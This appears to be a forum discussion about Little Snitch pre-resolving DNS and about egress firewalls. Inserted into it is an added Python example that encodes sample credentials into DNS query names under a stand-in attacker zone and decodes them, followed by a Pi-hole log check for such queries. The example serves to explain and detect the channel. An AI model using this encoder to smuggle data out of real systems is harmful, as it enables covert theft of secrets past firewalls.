Comment by runjake
20 hours ago
Little Snitch is probably the most popular one, written by devs who deeply understand macOS firewall architecture.
Little Snitch is a user-friendly, software-level blocker, only – use with caution.
Just FYI: LittleSnitch pre-resolves DNS entries BEFORE you click `Accept/Deny`, if you care & understand this potential security issue. Your upstream provider still knows whether you denied a query. Easily verifiable with a PiHole (&c).
I liken the comparison to disk RAIDs: a RAID is not a true backup; LittleSnitch is not a true firewall.
You need isolated hardware for true inbound/outbound protection.
>Just FYI: LittleSnitch pre-resolves DNS entries BEFORE you click `Accept/Deny`, if you care & understand this potential security issue. Your upstream provider still knows whether you denied a query. Easily verifiable with a PiHole (&c).
This also feels like an exfil route? Are DNS queries (no tcp connect) logged/blocked?
>Are DNS queries blocked?
No, not with LittleSnitch (neither in/out-bound).
When you see the LittleSnitch dialogue (asking to `Accept/Deny`), whatever hostname is there has already been pre-resolved by the upstream DNS provider (does not matter which option you select). This software pairs well with a PiHole (for easy layperson installs), but even then is insufficient for OP's attack.
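To make the "exfil route" point above concrete, here is an added example (not from the thread, and not Little Snitch or Pi-hole code) showing why a resolver query that goes out before any TCP connect is a channel in its own right: data is packed into base32 labels under an attacker-controlled zone, emitted as RFC 1035 wire-format queries, and recovered on the other side from nothing but the query names. The second half is the check you would actually run on the Pi-hole side: a crude scan of `pihole.log`-style lines for long or high-entropy subdomains. The zone `exfil.example`, the sample log lines and the thresholds are all assumptions constructed for the demo.

```python
"""DNS-as-exfil demo plus a resolver-log check.
Added example; the zone, log lines and thresholds are assumptions, not real data."""
import base64
import math
import re
import struct
from collections import Counter

EXFIL_ZONE = "exfil.example"   # hypothetical attacker-controlled zone (assumption)
MAX_LABEL = 63                 # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                 # practical limit for a presentation-format name


def encode_chunk(data: bytes, seq: int, zone: str = EXFIL_ZONE) -> str:
    """Encode one chunk as base32 labels under zone, prefixed with a sequence label.
    Base32 survives the case folding resolvers are allowed to apply to names."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"s{seq}", *labels, zone])
    if len(name) > MAX_NAME:
        raise ValueError("chunk too large for one query name")
    return name


def build_query(name: str, txid: int = 0x1337) -> bytes:
    """Minimal wire-format query (QTYPE A, QCLASS IN, RD set, one question)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def parse_query_name(pkt: bytes) -> str:
    """Read the QNAME back out of the question section (no compression there)."""
    pos, labels = 12, []
    while True:
        n = pkt[pos]
        pos += 1
        if n == 0:
            return ".".join(labels)
        labels.append(pkt[pos:pos + n].decode())
        pos += n


def decode_name(name: str, zone: str = EXFIL_ZONE):
    """Inverse of encode_chunk: returns (seq, data)."""
    if not name.endswith("." + zone):
        raise ValueError("not one of ours")
    inner = name[: -len(zone) - 1].split(".")
    seq = int(inner[0][1:])
    b32 = "".join(inner[1:]).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding we stripped
    return seq, base64.b32decode(b32)


def exfiltrate(data: bytes, chunk: int = 100) -> list:
    """Split data into query packets. Each one leaves as UDP/53 during resolution,
    before any TCP connect that a per-app Accept/Deny prompt could stop."""
    return [build_query(encode_chunk(data[i:i + chunk], i // chunk))
            for i in range(0, len(data), chunk)]


def reassemble(packets) -> bytes:
    """What the zone's authoritative server does with the queries it receives."""
    parts = sorted(decode_name(parse_query_name(p)) for p in packets)
    return b"".join(d for _, d in parts)


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


PIHOLE_RE = re.compile(r"query\[(\w+)\] (\S+) from (\S+)")   # dnsmasq-style line


def flag_suspicious(log_lines, max_name=80, min_entropy=3.5) -> list:
    """Crude check over pihole.log-style lines: very long names, or names whose
    part below a two-label zone is long and high-entropy. Thresholds and the
    two-label zone assumption are guesses; tune against your own baseline."""
    hits = []
    for line in log_lines:
        m = PIHOLE_RE.search(line)
        if not m:
            continue
        name = m.group(2)
        sub = name.rsplit(".", 2)[0].replace(".", "")
        if len(name) > max_name or (len(sub) >= 20 and shannon_entropy(sub) > min_entropy):
            hits.append(name)
    return hits


# Constructed sample log: one benign query and one carrying a 100-byte chunk.
SECRET = b"username=alice\npassword=correct horse battery staple\n" * 2
SAMPLE_LOG = [
    "Jan  1 12:00:00 dnsmasq[123]: query[A] www.example.org from 192.168.1.10",
    "Jan  1 12:00:01 dnsmasq[123]: query[A] " + encode_chunk(SECRET[:100], 0) + " from 192.168.1.10",
]

if __name__ == "__main__":
    print(reassemble(exfiltrate(SECRET)) == SECRET)   # round trip through query names
    print(flag_suspicious(SAMPLE_LOG))                # only the exfil name is flagged
```

Run it and the round trip prints `True`; nothing in the script touches the network, the point is that if it did, every `build_query` packet would be a separate UDP datagram that a per-app prompt for the later TCP connect never sees. On a real Pi-hole you would feed `/var/log/pihole.log` into `flag_suspicious`, expect false positives from CDN and telemetry names, and adjust the thresholds accordingly.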
Little Snitch is commercial. If you want largely similar features (focused on egress), check out LuLu: https://github.com/objective-see/LuLu
+1 Thanks, I forgot about LuLu!